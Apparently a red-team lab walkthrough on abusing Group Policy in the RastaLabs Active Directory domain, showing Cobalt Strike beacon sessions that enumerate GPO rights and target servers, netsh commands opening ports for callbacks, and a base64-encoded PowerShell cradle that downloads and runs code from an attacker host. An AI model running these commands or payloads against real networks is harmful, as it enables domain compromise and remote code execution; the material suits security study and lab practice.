Group Policy Object (GPO) is a part of a repository that controls a domain (or a forest) configuration of users and computers.
Use PowerView (or SharpView) to enumerate the SID of users (or groups) that can control GPO's
beacon> powershell-import /home/iron/Documents/RTO/Tools/PowerView.ps1
[*] Tasked beacon to import: /home/iron/Documents/RTO/Tools/PowerView.ps1
[+] host called home, sent: 143784 bytes
beacon> powerpick Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=rastalabs,DC=local" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
[+] host called home, sent: 10 bytes
[*] Tasked beacon to run: Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=rastalabs,DC=local" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl (unmanaged)
[+] host called home, sent: 134767 bytes
[+] received output:
ObjectDN : CN=Policies,CN=System,DC=rastalabs,DC=local
ActiveDirectoryRights : CreateChild
SecurityIdentifier : S-1-5-21-1396373213-2872852198-2033860859-1162
beacon> powerpick ConvertFrom-SID S-1-5-21-1396373213-2872852198-2033860859-1162
[*] Tasked beacon to run: ConvertFrom-SID S-1-5-21-1396373213-2872852198-2033860859-1162 (unmanaged)
[+] host called home, sent: 134777 bytes
[+] received output:
RLAB\\Infrastructure Support
Search which GPO the Helpdesk group can modify
beacon> powerpick Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier | fl
[*] Tasked beacon to run: Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier | fl (unmanaged)
[+] host called home, sent: 135029 bytes
[+] received output:
ObjectDN : OU=Member Servers,DC=rastalabs,DC=local
SecurityIdentifier : S-1-5-21-1396373213-2872852198-2033860859-1162
[+] received output:
ObjectDN : OU=SQL,OU=Member Servers,DC=rastalabs,DC=local
SecurityIdentifier : S-1-5-21-1396373213-2872852198-2033860859-1162
[+] received output:
ObjectDN : OU=MX,OU=Member Servers,DC=rastalabs,DC=local
SecurityIdentifier : S-1-5-21-1396373213-2872852198-2033860859-1162
ObjectDN : OU=FS,OU=Member Servers,DC=rastalabs,DC=local
SecurityIdentifier : S-1-5-21-1396373213-2872852198-2033860859-1162
[+] received output:
ObjectDN : OU=SRV,OU=Member Servers,DC=rastalabs,DC=local
SecurityIdentifier : S-1-5-21-1396373213-2872852198-2033860859-1162
Search which objects are in this groups:
beacon> powerpick Get-DomainComputer | ? { $_.DistinguishedName -match "OU=SQL" -or $_.DistinguishedName -match "OU=MX" -or $_.DistinguishedName -match "OU=FS" -or $_.DistinguishedName -match "OU=SRV" } | select DnsHostName
[*] Tasked beacon to run: Get-DomainComputer | ? { $_.DistinguishedName -match "OU=SQL" -or $_.DistinguishedName -match "OU=MX" -or $_.DistinguishedName -match "OU=FS" -or $_.DistinguishedName -match "OU=SRV" } | select DnsHostName (unmanaged)
[+] host called home, sent: 135041 bytes
[+] received output:
dnshostname
-----------
fs01.rastalabs.local
mx01.rastalabs.local
sql01.rastalabs.local
srv01.rastalabs.local
sql02.rastalabs.local
We can also look into the OU like this:
beacon> execute-assembly /opt/SharpCollection/NetFramework_4.7_Any/SharpView.exe Get-DomainOU -Identity "FS"
[*] Tasked beacon to run .NET program: SharpView.exe Get-DomainOU -Identity "FS"
[+] host called home, sent: 841313 bytes
[+] received output:
get-domain
[Get-DomainSearcher] search base: LDAP://dc01.rastalabs.local/DC=rastalabs,DC=local
[Get-DomainOU] Get-DomainOU filter string: (&(objectCategory=organizationalUnit)(|(name=FS)))
objectguid : 4ef1777f-1c7d-48d8-a654-0afe78dbadfe
name : FS
distinguishedname : OU=FS,OU=Member Servers,DC=rastalabs,DC=local
whencreated : 27/10/2017 08:42:48
whenchanged : 05/05/2020 12:39:43
objectclass : {top, organizationalUnit}
gplink : [LDAP://cn={17DF9AB4-2AAF-4E60-BF0C-75746436C80F},cn=policies,cn=system,DC=rastalabs,DC=local;0]
usnchanged : 508619
instancetype : 4
usncreated : 63690
dscorepropagationdata : {19/03/2020 20:17:18, 21/11/2017 17:12:47, 27/10/2017 08:42:48, 01/01/1601 00:04:17}
ou : FS
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rastalabs,DC=local
Add firewall rules
As a admin we need to ensure that we can receive back our connection from the servers we are going to exploit.
We can do it by running a script that adds the following rules:
netsh advfirewall firewall add rule name="NewEra 9090" dir=in action=allow protocol=TCP localport=9090
netsh advfirewall firewall add rule name="NewEra 9090" dir=out action=allow protocol=TCP localport=9090
netsh advfirewall firewall add rule name="NewEra 443" dir=in action=allow protocol=TCP localport=443
netsh advfirewall firewall add rule name="NewEra 443" dir=out action=allow protocol=TCP localport=443
Create Powershell script
Create a powershell script that will be executed on the hosts:
PS /opt/cobaltstrike> $str = "IEX ((new-object net.webclient).downloadstring('<http://10.10.121.107:9090/gpo3>'))"
PS /opt/cobaltstrike> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMQAuADEAMAA3ADoAOQAwADkAMAAvAGcAcABvADMAJwApACkA